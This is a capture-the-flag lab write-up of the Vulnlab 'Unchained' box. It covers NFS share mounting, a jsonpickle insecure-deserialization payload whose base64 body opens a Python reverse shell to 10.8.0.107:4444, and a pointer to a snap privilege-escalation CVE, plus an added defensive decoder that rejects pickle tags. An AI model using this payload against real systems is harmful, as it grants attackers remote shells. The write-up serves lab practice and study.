Vulnlab - Unchained [Medium] - 20/08/2023
Vulnlab Writeup
We can first mount the exposed NFS share called backup to a local folder called mounted.
sudo mount -t nfs -o nfsvers=3 10.10.89.250:/var/nfs/backup ./mounted -o nolock
We can see the source code is a project that results from this course:
Upon reviewing the code that we got from the mount, we can see that the /transaction path tries to decode the value of the transaction parameter. It then goes into BlockchainUtils.decode, which has the following code:
It is notable that decoding untrusted input directly with jsonpickle is vulnerable to insecure deserialization, so I've crafted the following payload:
{
"transaction": "{\"py\/object\": \"__main__.Transaction\", \"syl\": {\"py\/reduce\": [{\"py\/type\": \"subprocess.Popen\"}, {\"py\/tuple\": [{\"py\/tuple\": [\"python3\", \"-c\", \"import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjguMC4xMDciLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJiYXNoIik='))\"]}]}]}}"
}
I did this payload from scratch, but I found an article that has a much more efficient payload here:
Nonetheless, we can see that we got a connection back.
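A defender-side counterpart, added here and not part of the box or this writeup: a replacement for the decode step that parses the transaction with the standard json module and refuses any jsonpickle control tag before building the object. The Transaction fields (sender, receiver, amount) and the is_pickle_payload helper are assumptions, since the project's class is not shown on the page.

```python
import json
from dataclasses import dataclass
from typing import Any


# Hypothetical shape of the project's Transaction; the real class is not shown on the page.
@dataclass(frozen=True)
class Transaction:
    sender: str
    receiver: str
    amount: float


REQUIRED_FIELDS = {"sender", "receiver", "amount"}


def contains_pickle_tags(node: Any) -> bool:
    """True if any dict key is a jsonpickle control tag (py/object, py/reduce, py/type, ...).

    jsonpickle.decode() turns these tags into object reconstruction, which is how the
    writeup's payload reaches subprocess.Popen; plain json.loads() leaves them as data."""
    if isinstance(node, dict):
        return any(isinstance(k, str) and k.startswith("py/") for k in node) or any(
            contains_pickle_tags(v) for v in node.values())
    if isinstance(node, list):
        return any(contains_pickle_tags(v) for v in node)
    return False


def is_pickle_payload(raw: str) -> bool:
    """Cheap request-time check (hypothetical helper): does the string carry jsonpickle tags?"""
    try:
        return contains_pickle_tags(json.loads(raw))
    except ValueError:  # not even valid JSON; let the decoder reject it instead
        return False


def safe_decode_transaction(raw: str) -> Transaction:
    """Drop-in for BlockchainUtils.decode that never hands client input to jsonpickle."""
    data = json.loads(raw)
    if contains_pickle_tags(data):
        raise ValueError("jsonpickle control tags are not allowed in client input")
    if not isinstance(data, dict) or set(data) != REQUIRED_FIELDS:
        raise ValueError("unexpected transaction shape")
    if not all(isinstance(data[f], str) for f in ("sender", "receiver")):
        raise ValueError("sender and receiver must be strings")
    if isinstance(data["amount"], bool) or not isinstance(data["amount"], (int, float)):
        raise ValueError("amount must be a number")
    # Fields are copied explicitly; no class name or callable ever comes from the wire.
    return Transaction(data["sender"], data["receiver"], float(data["amount"]))


# Constructed samples: a benign transaction, and a tag-bearing one shaped like the
# writeup's payload but pointing at a harmless callable.
GOOD_SAMPLE = '{"sender": "alice", "receiver": "bob", "amount": 12.5}'
TAGGED_SAMPLE = ('{"py/object": "__main__.Transaction", "syl": {"py/reduce": '
                 '[{"py/type": "builtins.print"}, {"py/tuple": ["harmless"]}]}}')
```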
After that, and after a bit of enumeration, we can see that snap is in the user folder, which kind of hints at the vulnerability. The vulnerability is CVE-2021-44731; we can find a PoC on GitHub, and after that we are root.